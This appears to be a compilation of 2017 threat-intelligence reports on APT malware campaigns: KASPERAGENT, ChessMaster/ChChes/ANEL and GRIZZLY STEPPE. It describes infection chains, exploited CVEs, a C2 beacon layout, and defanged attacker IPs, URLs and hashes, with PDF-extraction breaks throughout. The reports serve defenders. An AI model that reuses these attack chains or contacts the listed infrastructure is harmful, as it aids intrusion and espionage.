Longhorn are distinctive and unique to this group, leaving little doubt about its link to Vault 7.
Throughout its investigation of Longhorn, Symantec
s priority has been protection of its
customers. Through identifying different strains of Longhorn malware, connecting them to a
single actor, and learning more about the group
s tactics and procedures, Symantec has been
able to better defend customer organizations against this and similar threats. In publishing this
new information, Symantec
s goal remains unchanged: to reassure customers that it is aware
of this threat and actively working to protect them from it.
Protection
Symantec and Norton products have been protecting against Longhorn malware for a number
of years with the following detections:
Tags: Products, Endpoint Protection, Endpoint Protection Cloud, Security Response,
AIT, APT, Backdoor.Plexor, , , Investigation, Longhorn, Trojan.Corentry, Vault 7
KASPERAGENT Malware Campaign resurfaces in May
Election
threatconnect.com /blog/kasperagent-malware-campaign/
6/14/2017
KASPERAGENT Malware Campaign resurfaces in the run up to May
Palestinian Authority Elections
ThreatConnect has identified a KASPERAGENT malware campaign leveraging decoy Palestinian Authority
documents. The samples date from April - May 2017, coinciding with the run up to the May 2017 Palestinian
Authority elections. Although we do not know who is behind the campaign, the decoy documents
content focuses on
timely political issues in Gaza and the IP address hosting the campaign
s command and control node hosts several
other domains with Gaza registrants.
In this blog post we will detail our analysis of the malware and associated indicators, look closely at the decoy files,
and leverage available information to make an educated guess on the possible intended target. Associated
indicators and screenshots of the decoy documents are all available here in the ThreatConnect platform.
Some of the indicators in the following post were published on AlienVault OTX on 6/13.
Background on KASPERAGENT
KASPERAGENT is Microsoft Windows malware used in efforts targeting users in the United States, Israel,
Palestinian Territories, and Egypt since July 2015. The malware was discovered by Palo Alto Networks Unit 42 and
ClearSky Cyber Security, and publicized in April 2017 in the Targeted Attacks in the Middle East Using
KASPERAGENT and MICROPSIA blog. It is called KASPERAGENT based on PDB strings identified in the malware
such as
c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb.
The threat actors used shortened URLs in spear phishing messages and fake news websites to direct targets to
download KASPERAGENT. Upon execution, KASPERAGENT drops the payload and a decoy document that
displays Arabic names and ID numbers. The malware establishes persistence and sends HTTP requests to the
command and control domain mailsinfo[.]net. Of note, the callbacks were to PHP scripts that included /dad5/ in the
URLs. Most samples of the malware reportedly function as a basic reconnaissance tool and downloader. However,
some of the recently identified files display
extended-capability
including the functionality to steal passwords, take
screenshots, log keystrokes, and steal files. These
extended-capability
samples called out to an additional
command and control domain, stikerscloud[.]com. Additionally, early variants of KASPERAGENT used
Chrome
the user agent, while more recent samples use
OPAERA
- a possible misspelling of the
Opera
- browser. The
indicators associated with the blog article are available in the ThreatConnect Technical Blogs and Reports source
here.
The samples we identified leverage the same user agent string
OPAERA
, included the kasper PDB string reported
by Unit 42, and used similar POST and GET requests. The command and control domains were different, and these
samples used unique decoy documents to target their victims.
Identifying another KASPERAGENT campaign
We didn
t start out looking for KASPERAGENT, but a file hit on one of our YARA rules for an executable designed to
display a fake XLS icon - one way adversaries attempt to trick targets into thinking a malicious file is innocuous. The
first malicious sample we identified (6843AE9EAC03F69DF301D024BFDEFC88) had the file name
testproj.exe
and was identified within an archive file (4FE7561F63A71CA73C26CB95B28EAEE8) with the name
.r24
. This translates to
The Complete Details of Fuqaha's Assassination
, a reference to Hamas military
leader Mazen Fuqaha who was assassinated on March 24, 2017.
We detonated the file in VxStream
s automated malware analysis capability and found testproj.exe dropped a
benign Microsoft Word document that pulls a jpg file from treestower[.]com. Malwr.com observed this site in
association with another sample that called out to mailsinfo[.]net - a host identified in the Targeted Attacks in the
Middle East Using KASPERAGENT and MICROPSIA blog. That was our first hint that we were looking at
KASPERAGENT.
The jpg pulled from treestower[.]com displays a graphic picture of a dead man, which also appeared on a
Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha. A separate malicious
executable - 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 (vlc.exe) - runs when the photograph is displayed, using
the YouTube icon and calling out to several URLs on windowsnewupdates[.]com. This host was registered in late
March and appears to be unique to this campaign.
With our interest piqued, we pivoted on the import hashes (also known as an imphash), which captures the import
table of a given file. Shared import hashes across multiple files would likely identify files that are part of the same
malware family. We found nine additional samples sharing the imphash values for the two executables,
C66F88D2D76D79210D568D7AD7896B45 and DCF3AA484253068D8833C7C5B019B07.
Import Hash Results c66f88d2d76d79210d568d7ad7896b45
Import Hash Results dcf3aa484253068d8833c7c5b019b07a
Analysis of those files uncovered two more imphashes, 0B4E44256788783634A2B1DADF4F9784 and
E44F0BD2ADFB9CBCABCAD314D27ACCFC, for a total of 20 malicious files. These additional samples behaved
similarly to the initial files; testproj.exe dropped benign decoy files and started malicious executables. The malicious
executables all called out to the same URLs on windowsnewupdates[.]com.
These malware samples leverage the user agent string
OPAERA,
the same one identified in the Targeted Attacks
in the Middle East Using KASPERAGENT and MICROPSIA blog. Although the command and control domain was
different from those in the report, the POST and GET requests were similar and included /dad5/ in the URL string. In
addition, the malware samples included the kasper PDB string reported by Unit 42, prompting us to conclude that
we were likely looking at new variants of KASPERAGENT.
The Decoy Files
Several of the decoy files appeared to be official documents associated with the Palestinian Authority - the body that
governs the Palestinian Territories in the Middle East. We do not know whether the files are legitimate Palestinian
Authority documents, but they are designed to look official. Additionally, most of the decoy files are publicly available
on news websites or social media.
The first document - dated April 10, 2017 - is marked
Very Secret
and addressed to Yahya Al-Sinwar, who Hamas
elected as its leader in Gaza in February 2017. Like the photo displayed in the first decoy file we found, this
document references the death of Mazen Fuqaha. The Arabic-language text and English translation of the document
are available in ThreatConnect here. A screenshot of the file is depicted below.
The second legible file, dated April 23, has the same letterhead and also is addressed to Yahya al-Sinwar. This file
discusses the supposed announcement banning the rival Fatah political party, which controls the West Bank, from
Gaza. It mentions closing the Fatah headquarters and houses that were identified as meeting places as well as the
arrest of some members of the party.
Looking at the Infrastructure
We don
t know for sure who is responsible for this campaign, but digging into the passive DNS results led us to
some breadcrumbs. Starting with 195.154.110[.]237, the IP address which is hosting the command and control
domain windowsnewupdates[.]com, we found that the host is on a dedicated server.
ThreatConnect DomainTools Integration Results
Using our Farsight DNSDB integration, we identified other domains currently and previously hosted on the same IP.
Reverse DNS and Passive DNS results for 195.154.110[.]237
Two of the four domains that have been hosted at this IP since 2016 -- upfile2box[.]com and 7aga[.]net -- were
registered by a freelance web developer in Gaza, Palestine. This IP has been used to host a small number of
domains, some of which were registered by the same actor, suggesting the IP is dedicated for a single individual or
group
s use. While not conclusive, it is intriguing that the same IP was observed hosting a domain ostensibly
registered in Gaza AND the command and control domain associated with a series of targeted attacks leveraging
Palestinian Authority-themed decoy documents referencing Gaza.
Targeting Focus?
Just like we can
t make a definitive determination as to who conducted this campaign, we do not know for sure who
it was intended to target. What we do know is that several of the malicious files were submitted to a public malware
analysis site from the Palestinian Territories. This tells us that it is possible either the threat actors or at least one of
the targets is located in that area. Additionally, as previously mentioned, the decoy document subject matter would
likely be of interest to a few different potential targets in the Palestinian Territories. Potential targets such as Hamas
who controls the Gaza strip and counts Mazen Fuqaha and Yahya al-Sinwar as members, Israel which is accused of
involvement in the assassination of Mazen Fuqaha, and the Fatah party of which the Prime Minister and President
of the Palestinian Authority are members.
The campaign corresponds with a period of heightened tension in Gaza. Hamas, who has historically maintained
control over the strip, elected Yahya al-Sinwar - a hardliner from its military wing - as its leader in February. A
Humanitarian Bulletin published by the United Nations
Office for the Coordination of Humanitarian Affairs indicates
in March 2017 (just before the first malware samples associated with this campaign were identified in early April)
Hamas created
a parallel institution to run local ministries in Gaza,
further straining the relationship between
Hamas and the Palestinian Authority who governs the West Bank. After this announcement, the Palestinian Authority
cut salaries for its employees in Gaza by 30 percent and informed Israel that it would no longer pay for electricity
provided to Gaza causing blackouts throughout the area and escalating tensions between the rival groups. Then, in
early May (two days after the last malware sample was submitted) the Palestinian Authority held local elections in
the West Bank which were reportedly seen as a test for the Fatah party. Elections were not held in Gaza.
All of that is to say, the decoy documents leveraged in this campaign would likely be relevant and of interest to a
variety of targets in Israel and Palestine, consistent with previously identified KASPERAGENT targeting patterns.
Additionally, the use of what appear to be carefully crafted documents at the very least designed to look like official
government correspondence suggests the malware may have been intended for a government employee or
contractor who would be interested in the documents
subject matter. More associated indicators, screenshots of
many of the decoy documents, and descriptions of the activity are available via the March - May 2017 Kasperagent
Malware Leveraging WindowsNewUpdates[.]com Campaign in ThreatConnect.
ChessMaster Makes its Move: A Look into the Campaign
Cyberespionage Arsenal
blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/
Trend Micro
July 27, 2017
by Benson Sy, CH Lei, and Kawabata Kohei
From gathering intelligence, using the right social
engineering lures, and exploiting vulnerabilities to laterally
moving within the network, targeted attacks have multifarious
tools at their disposal. And like in a game of chess, they are
the set pieces that make up their modus operandi.
Take for instance the self-named ChessMaster, a campaign
targeting Japanese academe, technology enterprises, media
outfits, managed service providers, and government
agencies. It employs various poisoned pawns in the form of
malware-laden spear-phishing emails containing decoy documents. And beyond
ChessMaster
s endgame and pawns, we also found red flags that allude to its links to APT 10,
also known as menuPass, POTASSIUM, Stone Panda, Red Apollo, and CVNX.
ChessMaster
s name is from pieces of chess/checkers/draughts we found in the resource
section of the main backdoor they use against their targets: ChChes, which Trend Micro
detects as BKDR_CHCHES.
What makes the campaign unique is its arsenal of tools and techniques:
Malicious shortcut (LNK) files and PowerShell. The LNK files execute Command
Prompt that downloads a PowerShell script, which would either directly drop or
reflectively load ChChes into the machine. The latter method makes ChChes a fileless
malware.
Self-extracting archive (SFX). An archive that drops an executable (EXE), a dynamiclink library (DLL), and a binary file (.BIN). Upon their extraction, malicious code is
injected into the process of a legitimate file/application (DLL hijacking). ChessMaster
takes it up a notch via load-time dynamic linking to trigger the malicious DLL
s function.
Runtime packers. Throughout its campaign, ChChes used three packers to obfuscate
itself and avoid detection. The first had no encryption and a varied loader code. The
second had a buggy (or anti-emulation) exclusive OR (XOR) encryption technique. The
third added an AES algorithm on top of XOR encryption. Their compile dates overlap,
which indicates ChChes
authors take cues and fine-tune their malware.
Second-stage payloads. Additional malware are introduced to the infected system for
persistence. These are actually variants of ChChes that use similar entry points but
different and encrypted C&C communication.
Hacking Tools. ChessMaster draws on legitimate email and browser password recovery
and dumping tools they
ve misused and modified for their campaign. These can restore
forgotten passwords, which are then dumped and retrieved. Lateral movement and
further attacks can be worked out from here.
TinyX. A version of PlugX sans the plug-in functionality that allows it to adopt new
capabilities. TinyX is bundled separately in spear-phishing emails.
RedLeaves. A second-stage backdoor that operates like the open-source and fileless
remote access Trojan (RAT) Trochilus, which is known for enabling lateral movement in
the infected systems. RedLeaves adopted capabilities from PlugX. In April, a RedLeaves
variant named himawari (Japanese for sunflower) emerged capable of evading YARA
rules released during that time.
ChessMaster and APT 10 Plays the Same Cyberespionage Game
APT 10/menuPass is a cyberespionage group whose specific campaign, Operation Cloud
Hopper, attacked the intermediaries of their targets of interest
managed service providers
(MSPs). Its notoriety stems from their prolific use of multifarious information-stealing backdoors
and vulnerability exploits, along with the tenacity of its subterfuges, from spear-phishing emails
to attack and infection chains. It also abused legitimate or open-source remote administration
tools to steal data.
If that sounded familiar, it
s because ChessMaster and APT 10 appear to be playing the same
cyberespionage game. Here
s a further illustration:
Figure 1: Similarities in ChessMaster and APT 10
s attack chain
We first saw ChChes set its sights on an organization that
s long been a target of APT
10/menuPass. As we caught and delved into more ChChes samples in the wild, however, we
also saw how they followed the same pattern
exclusive packers, mutual targets, overlapping
C&C infrastructure.
ChChes
packer, for instance, resembled the one used in menuPass
old PlugX samples. DNS
records also showed that some of their command and control (C&C) servers and domains
resolved to the same IP address, or resided in the same subnet. Are they operated by the
same actors? Their commonalities make it appear so. It
s also known to happen; BlackTech
cyberespionage campaigns are a case in point.
Figure 2: Comparison of Emdivi and ChChes
ChessMaster
s ChChes also resembles another backdoor, Emdivi, which first made waves in
2014. They have the same endgame. Both are second-stage payloads that use the system
Security Identifier (SID) as encryption key so they execute only in their target
s machine. Their
difference lies in complexity
ChChes hides part of the decryption key and payload in registry
keys to make it harder to reverse engineer.
But that
s just one dot in several we
ve connected. In one instance, we detected PlugX and
Emdivi on the same machine. This PlugX variant connected to an APT 10/menuPass-owned
domain, but the packer is similar to that used by ChChes. While it
s possible it was hit by two
different campaigns, further analysis told a different story. Both were compiled on the same
date, only several hours apart. We detected and acquired the samples the next day, which
means both backdoors were delivered to the victim a day after they were compiled.
Figure 3: Overview of the overlaps in ChessMaster and APT 10
s campaigns
Take
Control of the Center
Ultimately attacks like ChessMaster
s make pawns out of the systems, networks, devices and
their users, all of which hold the organization
s crown jewels. This is why enterprises need to
be steps ahead of the game: prepare, respond, restore, and learn. Plan ahead
what
techniques will attackers use? How can I defend against them? Don
t just pull the plug
understand what happened to better assess and mitigate the damage. Fine-tune your
response
what worked, what didn
t, and what could
ve been done better?
Defense in depth plays a crucial role especially for the IT/system administrators and
information security professionals that watch over them. The network, endpoints, servers,
mobile devices, and web/email gateways are the bishops, knights, and rooks that underpin the
enterprise
s crown jewels, which is why securing them is important. Reduce their attack
surface. Keep the systems updated and regularly patched, and enforce the principle of least
privilege. Employ behavior monitoring and application control. Deploy firewalls as well intrusion
detection and prevention systems. Implement URL categorization, network segmentation, and
data categorization.
ChessMaster
s gambit is spear-phishing, so it
s especially important to filter and safeguard the
email gateway. Additionally, foster a cybersecurity-aware workforce. Seemingly benign icons
or decoy documents can still swindle the victim, for instance. More importantly, develop
proactive incident response and remediation strategies
threat intelligence helps enterprises
prepare and mitigate attacks. Like in chess, the more you understand your enemy
s moves,
the more successful you can be at thwarting them.
The Indicators of Compromise (IoCs) related to ChessMaster
s campaigns is in this appendix.
This has been presented in the RSA Conference 2017 Asia Pacific & Japan as
ChessMaster:
A New Campaign Targeting Japan Using the New ChChes Backdoor
on July 27, 2017, in
Marina Bay Sands, Singapore.
Updated on August 14, 2017, 11:50 PM to include IoCs related to ChessMaster.
ChessMaster
s New Strategy: Evolving Tools and Tactics
blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/
Trend Micro
November 6, 2017
by MingYen Hsieh, CH Lei, and Kawabata Kohei
A few months ago, we covered the ChessMaster
cyberespionage campaign, which leveraged a variety of
toolsets and malware such as ChChes and remote access
trojans like RedLeaves and PlugX to compromise its targets
primarily organizations in Japan. A few weeks ago, we
observed new activity from ChessMaster, with notable
evolutions in terms of new tools and tactics that weren
present in the initial attacks. From what we
ve seen,
ChessMaster is continuously evolving, using open source
tools and ones they developed, likely as a way to anonymize their operations. Based on the
way the campaign has developed, it won
t be surprising to see additional evolutions from
ChessMaster in the future.
Infection Vector
Figure: 1 ChessMaster infection chain.
Here is a summary of how ChessMaster enters a target system:
1. An exploit document arrives on a target system. This document abuses a SOAP WSDL
parser vulnerability (CVE-2017-8759) that affects the Microsoft .NET Framework
2. It then accesses the remote server 89[.]18[.]27[.]159/img.db
3. Once the victim opens the document, the attacker can execute arbitrary commands on
the victim
s machine.
4. The exploit document then launches mshta.exe to access 89[.]18[.]27[.]159:8080/lK0RS,
which serves as the first backdoor into the system
5. This backdoor launches a malicious PowerShell script
6. The PowerShell script downloads and activates the malware located in the remote
server 89[.]18[.]27[.]159/FA347FEiwq.jpg
7. jpg is the second backdoor, which uses the Command-and-Control (C&C)
server62[.]75[.]197[.]131.
As mentioned earlier, the first step of the new campaign involves the use of an exploit
document that connects to the remote server 89[.]18[.]27[.]159/img.db when opened. Img.db
holds the exploit command, which will execute the content of another remote server,
89[.]18[.]27[.]159:8080/lK0RS, via mhsta.exe.
The image below shows the malicious link 89[.]18[.]27[.]159/img.db embedded in the exploit
document:
Figure 2. Link embedded in the document
89[.]18[.]27[.]159:8080/lK0RS is a JScript backdoor, which apparently comes from an open
source RAT known as
Koadic.
At this stage, we observed that the attacker tried to gather the system
s environment
information via command line tools. We also observed that some commands were based on
the result of a previous command, which means that not all parts of the attack were automated
and that parts of the commands were done manually. While this might be a sign of a more
sophisticated automation technique, we believe that this may be an attacker trying to get up
close and personal by manually checking the environment before delivering the final payload.
It is possible that this was done to avoid sandboxing or analysis by researchers.
While we were not able to gather the actual live data of the next step of the attack, we were
able to observe Koadic and the following script, which tries to download another DLL file from
the same server that hosts Koadic, at the same time. We believe that FA347FEiwq.jpg serves
as the final payload of this attack.
Figure 3: PowerShell script used to download & execute FA347FEiwq.jpg
The script attempts to download the file from 89[.]18[.]27[.]159/FA347FEiwq.jpg (detected by
Trend Micro as BKDR_ANEL.ZKEI), a DLL file which serves as the second backdoor. The
Powershell script leverages RegisterXLL, which is a component of Excel, to load BKDR_ANEL
into Excel.exe
Figure 4: FA347FEiwq.jpg is loaded by Excel.exe
Backdoor Analysis
BKDR_ANEL is downloaded from89[.]18[.]27[.]159. Once loaded onto the system, it will launch
and inject code into svchost.exe, after which the injected code decrypts and activates the
embedded backdoor. BKDR_ANEL has a Microsoft signature attached
the signature is
invalid and likely added to make it seem more harmless.
The backdoor has a hardcoded malware version labeled
5.0.0 beta1
that contains basic
backdoor routines with a string-like
Function not implemented.
inside. The relatively
incomplete code might be a clue of a new variant in the future.
The malware
s C&C protocol is very similar to the one used by BKDR_CHCHES at first glance:
Figure 5: Comparison of BKDR_ANEL and BKDR_CHCHES
C&C protocols
However they are different backdoors, with BKDR_CHCHES employing RC4 as its main
encryption algorithm wherein the decryption key is sent with the encrypted information
separated by
and set in the Cookie header. On the other hand, BKDR_ANEL utilizes
Blowfish with the hardcoded encryption key obviously labeled as
this is the encrypt key.
Another difference between the two is that BKDR_CHCHES does not contain any backdoor
routines by default. Instead, it loads additional modules from the C&C server directly into
memory. Alternatively, BKDR_ANEL is more like a regular backdoor embedded with basic
backdoor routines.
The image and table below illustrate the information BKDR_ANEL sends, and how
BKDR_ANEL encrypts the information.
Figure 6: Information sent by BKDR_ANEL (1/2)
Offset
Description
Example in previous figure
Process ID
78 0C 00 00
MD5(computer name + machine
GUID)
20 C4 36 1D 03 2F 93 B8
C7 A0 01 9A EB 2B BD EF
0x14
Computer name
TEST
0x20
Timestamp
1508201270
0x2a
OS version
5.1.2600
0x3a
User name
Administrator
0x47
Time zone information
00 00 00 00 =>
(Bias / 60)
00 00 00 00 =>
(Bias % 60)
01 00 00 00 => Has DaylightBias or not
0x53
Current directory
C:\Documents and Settings\Administrator\My
Documents
0x87
Backdoor version
5.0.0 beta1
Table 1: Information sent by BKDR_ANEL (2/2)
Figure 7: BKDR_ANEL encryption process
The information blocks are separated by
. As seen in the image above; the string before
in each block, such as
oVG,
is not used.
Further similarities between BKDR_ANEL and BKDR_CHCHES can be seen in special partial
MD5 logic. Both malware only uses the middle 8 bytes from the regular MD5 result.
BKDR_CHCHES will use it to encrypt the network traffic, while BKDR_ANEL uses it as a code
branch in the malware encryption routine, although from our analysis, it does not look like it is
currently in use.
Mitigation
To combat campaigns like ChessMaster, organizations need to make full use of the tools
available to them. This includes everything from regularly updating their systems to the latest
patches, which minimizes the impact of attacks that leverage vulnerabilities. In addition, the
proper use of behavior monitoring, application control, email gateway monitoring, and
intrusion/detection systems can help detect any suspicious activities that occur within the
network. Finally, organizations need to cultivate a culture of security to educate users on what
to look out for in terms of potential attacks, as end users are often the primary target of these
kinds of campaigns.
Organizations can also strengthen their security by employing solutions such as Trend
Micro
Vulnerability Protection
, which protects endpoints from threats that exploit
vulnerabilities via a high-performance engine monitors traffic for new specific vulnerabilities
that uses host-based intrusion prevention system (IPS) filters as well as zero-day attack
monitoring.
In addition, comprehensive security solutions can be used to protect organizations from
attacks. These include Trend Micro endpoint solutions such as Trend Micro
Smart
Protection Suites, and Worry-Free
Business Security, which can protect users and
businesses from these threats by detecting malicious files, well as blocking all related
malicious URLs. Trend Micro Deep Discovery
has an email inspection layer that can protect
enterprises by detecting malicious attachment and URLs.
Trend Micro OfficeScan
with XGen
endpoint security infuses high-fidelity machine learning
with other detection technologies and global threat intelligence for comprehensive protection
against all kinds of threats.
Indicators of Compromise:
Related hashes detected as BKDR_ANEL.ZKEI (SHA-256):
af1b2cd8580650d826f48ad824deef3749a7db6fde1c7e1dc115c6b0a7dfa0dd
Command-and-control server:
hxxp://62[.]75[.]197[.]131/page/?[random strings]
URLs related to the campaign
hxxp://89[.]18[.]27[.]159/img.db
hxxp://89[.]18[.]27[.]159:8080/lK0RS
hxxp://89[.]18[.]27[.]159/FA347FEiwq.jpg
TLP:WHITE
National Cybersecurity and
Communications Integration Center
AN AL Y S I S R E P O R T
DISCLAIMER: This report is provided
as is
for informational purposes only. The Department of Homeland
Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS
does not endorse any commercial product or service referenced in this advisory or otherwise. This document is
distributed as TLP:WHITE: Subject to standard copyright rules, TLP:WHITE information may be distributed
without restriction. For more information on the Traffic Light Protocol, see https://www.us-cert.gov/tlp.
Reference Number: AR-17-20045
February 10, 2017
Enhanced Analysis of GRIZZLY STEPPE Activity
Executive Summary
The Department of Homeland Security (DHS) National Cybersecurity and Communications
Integration Center (NCCIC) has collaborated with interagency partners and private-industry
stakeholders to provide an Analytical Report (AR) with specific signatures and recommendations
to detect and mitigate threats from GRIZZLY STEPPE actors.
Contents
Executive Summary ...................................................................................................................................... 1
Recommended Reading about GRIZZLY STEPPE ..................................................................................... 2
Utilizing Cyber Kill Chain for Analysis ....................................................................................................... 4
Reconnaissance ......................................................................................................................................... 4
Weaponization .......................................................................................................................................... 5
Delivery .................................................................................................................................................... 5
Exploitation ............................................................................................................................................... 5
Installation................................................................................................................................................. 6
Command and Control .............................................................................................................................. 6
Actions on the Objective ........................................................................................................................... 6
Detection and Response ................................................................................................................................ 7
APPENDIX A: APT28 ................................................................................................................................. 8
APPENDIX B: APT29 ............................................................................................................................... 42
APPENDIX C: Mitigations Guidance ........................................................................................................ 50
Defending Against Webshell Attacks ..................................................................................................... 50
Defending Against Spear Phishing Attacks ............................................................................................ 52
APPENDIX D: Malware Initial Findings Report (MIFR)-10105049 UPDATE 2 ..................................... 55
1 of 56
1 of 56
TLP:WHITE
TLP:WHITE
Recommended Reading about GRIZZLY STEPPE
DHS recommends reading multiple bodies of work concerning GRIZZLY STEPPE. While DHS
does not endorse any particular company or their findings, we believe the breadth of literature
created by multiple sources enhances the overall understanding of the threat. DHS encourages
analysts to review these resources to determine the level of threat posed to their local network
environments.
DHS Resources
JAR-16-20296 provides technical details regarding the tools and infrastructure used by the
Russian civilian and military intelligence Services (RIS) to compromise and exploit networks
and endpoints associated with the U.S. election, as well as a range of U.S. Government, political,
and private sector entities. JAR-16-20296 remains a useful resource for understanding APT28
and APT29 use of the cyber kill chain and exploit targets. Additionally, JAR-16-20296 discusses
some of the differences in activity between APT28 and APT29. This AR primarily focuses on
APT28 and APT29 activity from 2015 through 2016.
DHS Malware Initial Findings Report (MIFR)-10105049 UPDATE 2 was updated January 27,
2017 to provide additional analysis of the artifacts identified in JAR 16-20296. The artifacts
analyzed in this report include 17 PHP files, 3 executables and 1 RTF file. The PHP files are web
shells designed to provide a remote user an interface for various remote operations. The RTF file
is a malicious document designed to install and execute a malicious executable. However, DHS
recommends that analysts read the MIFR in full to develop a better understanding of how the
GRIZZLY STEPPE malware executes on a system, which, in turn, downloads additional
malware and attempts to extract cached passwords. The remaining two executables are Remote
Access Tools (RATs) that collect host information, including digital certificates and private keys,
and provide an actor with remote access to the infected system.
Open Source
Several cyber security and threat research firms have written extensively about GRIZZLY
STEPPE. DHS encourages network defenders, threat analysts, and general audiences to review
publicly available information to develop a better understanding of the tactics, techniques, and
procedures (TTPs) of APT28 and APT29 and to potentially mitigate against GRIZZLY STEPPE
activity.
The below examples do not constitute an exhaustive list. The U.S. Government does not endorse
or support any particular product or vendor.
2 of 56
2 of 56
TLP:WHITE
TLP:WHITE
Source
ESET
En Route with Sednit version 1.0
Group
APT28/2
APT28
ESET
Visiting The Bear Den
APT28
FireEye
APT28
F-Secure
APT28: A Window Into Russia's Cyber Espionage Operations?
HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat
Group
APT28: At the Center of the Storm - Russia strategically evolves its
cyber operations
BlackEnergy & Quedagh the convergence of crimeware and APT
attacks, TLP: WHITE
The Dukes 7 years of Russian cyberespionage
F-Secure
COSMICDUKE: Cosmu with a twist of MiniDuke
APT29
F-Secure
OnionDuke: APT Attacks Via the Tor Network
APT29
F-Secure
COZYDUKE
APT29
Kaspersky
Sofacy APT hits high profile targets with updated toolset
APT28
Crysys
Palo Alto
Networks
Palo Alto
Networks
Palo Alto
Networks
Palo Alto
Networks
Miniduke: Indicators
APT29
DealersChoice
is Sofacy
s Flash Player Exploit Platform
APT28
Sofacy
Komplex
OS X Trojan
APT28
The Dukes R&D Finds a New Anti-Analysis Technique - Palo Alto
Networks Blog
APT29
Tracking MiniDionis: CozyCar
s New Ride Is Related to Seaduke
APT29
APT28
Securelist
APT28: Sofacy? So-funny
Cyber Threat Operations: Tactical Intelligence Bulletin - Sofacy
Phishing
The CozyDuke APT
SecureWorks
Threat Group-4127 Targets Hillary Clinton Presidential Campaign
APT28
ThreatConnect
ThreatConnect and Fidelis Team Up to Explore the DCCC Breach
APT28
ThreatConnect
ThreatConnect follows Guccifer 2.0 to Russian VPN Service
ThreatConnect
ThreatConnect Identifies Additional Infrastructure in DNC Breach
ThreatConnect
Belling the BEAR
APT28
APT28/2
APT28
ThreatConnect
Can a BEAR Fit Down a Rabbit Hole?
APT28
Trend Micro
APT28
Trend Micro
Operation Pawn Storm Using Decoys to Evade Detection
Pawn Storm Ramps Up Spear-phishing Before Zero-Days Get
Patches
PowerDuke: Widespread Post-Election Spear Phishing Campaigns
Targeting Think Tanks and NGOs
Operation Pawn Storm: Fast Facts and the Latest Developments
ATP 29
ESET
En Route with Sednit - Part 2: Observing the Comings and Goings
ATP 28
3 of 56
TLP:WHITE
Crowdstrike
FireEye
FireEye
F-Secure
Trend Micro
Volexity
3 of 56
Title
Bears in the Midst: Intrusion into the DNC
APT29
APT28
APT28
APT29
APT28
APT29
APT28
APT29
TLP:WHITE
Utilizing Cyber Kill Chain for Analysis
DHS analysts leverage the Cyber Kill Chain model to analyze, discuss, and dissect malicious
cyber activity. The phases of the Cyber Kill Chain are Reconnaissance, Weaponization,
Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective. This
section will provide a high-level overview of GRIZZLY STEPPE activity within this framework.
Reconnaissance
GRIZZLY STEPPE actors use various reconnaissance methods to determine the best attack
vector for compromising their targets. These methods include network vulnerability scanning,
credential harvesting, and using
doppelganger
(also known as
typo-squatting
) domains to
target victim organizations. The doppelganger domains can be used for reconnaissance when
users incorrectly type in the web address in a browser or as part of delivery as a URL in the body
of a phishing emails. DHS recommends that network defenders review and monitor their
networks for traffic to sites that look similar to their own domains. This can be an indicator of
compromise that should trigger further research to determine whether a breach has occurred.
Often, these doppelganger sites are registered to suspicious IP addresses. For example, a site
pretending to be an organization
s User Log In resolving to a TOR node IP address may be
considered suspicious and should be researched by the organization
s security operations center
(SOC) for signs of users navigating to that site. Because these doppelganger sites normally
mimic the targeted victim
s domain, they were not included in JAR-16-20296.
Before the 2016 U.S. election, DHS observed network scanning activity that is known as
reconnaissance. The IPs identified performed vulnerability scans attempting to identify websites
that are vulnerable to cross-site scripting (XSS) or Structured Query Language (SQL) injection
attacks. When GRIZZLY STEPPE actors identify a vulnerable site, they can then attempt to
exploit the identified vulnerabilities to gain access to the targeted network. Network perimeter
scans are often a precursor to network attacks and DHS recommends that security analysts
identify the types of scans carried out against their perimeters. This information can aid security
analysts in identifying and patching vulnerabilities in their systems.
Another common method used by GRIZZLY STEPPE is to host credential-harvesting pages as
seen in Step 4 and Step 5 of the GRIZZLY STEPPE attack lifecycle graphic. This technique
includes hosting a temporary website in publicly available infrastructure (i.e., neutral space) that
users are directed to via spear-phishing emails. Users are tricked into entering their credentials in
these temporary sites, and GRIZZLY STEPPE actors gain legitimate credentials for users on the
targeted network.
4 of 56
4 of 56
TLP:WHITE
TLP:WHITE
Weaponization
GRIZZLY STEPPE actors have excelled at embedding malicious code into a number of file
types as part of their weaponization efforts. In 2014, it was reported that GRIZZLY STEPPE
actors were wrapping legitimate executable files with malware (named
OnionDuke
) to
increase the chance of bypassing security controls. Since weaponization actions occur within the
adversary space, there is little that can be detected by security analysts during this phase. APT28
and APT29 weaponization methods have included:
Code injects in websites as watering hole attacks
Malicious macros in Microsoft Office files
Malicious Rich Text Format (RTF) files with embedded malicious flash code
Delivery
As described in JAR-16-20296 and numerous publicly available resources, GRIZZLY STEPPE
actors traditionally use spear-phishing emails to deliver malicious attachments or URLs that lead
to malicious payloads. DHS recommends that network defenders conduct analysis of their
systems to identify potentially malicious emails involving variations on GRIZZLY STEPPE
themes. Inbound emails subjects should be reviewed for the following commonly employed
titles, text, and themes:
efax, e-Fax, efax #100345 (random sequence of numbers)
PDF, PFD, Secure PDF
Topics from current events (e.g.,
European Parliament statement on
Fake Microsoft Outlook Web Access (OWA) log-in emails
Invites for cyber threat events
Additionally, GRIZZLY STEPPE actors have infected pirated software in torrent services and
leveraged TOR exit nodes to deliver to malware since at least 2014. These actors are capable of
compromising legitimate domains and services to host and deliver malware in an attempt to
obscure their delivery methods. DHS notes that the majority of TOR traffic is not GRIZZLY
STEPPE activity. The existence of a TOR IP in a network log only indicates that network
administrators should review the related traffic to determine if it is legitimate activity for that
specific environment.
Exploitation
GRIZZLY STEPPE actors have developed malware to exploit a number of Common
Vulnerability and Exposures (CVEs). DHS assesses that these actors commonly target Microsoft
Office exploits due to the high likelihood of having this software installed on the targeted hosts.
5 of 56
5 of 56
TLP:WHITE
TLP:WHITE
While not all-encompassing, the following CVEs have been targeted by GRIZZLY STEPPE
actors in past attacks.
CVE-2016-7855: Adobe Flash Player Use-After-Free Vulnerability
CVE-2016-7255: Microsoft Windows Elevation of Privilege Vulnerability
CVE-2016-4117: Adobe Flash Player Remoted Attack Vulnerability
CVE-2015-1641: Microsoft Office Memory Corruption Vulnerability
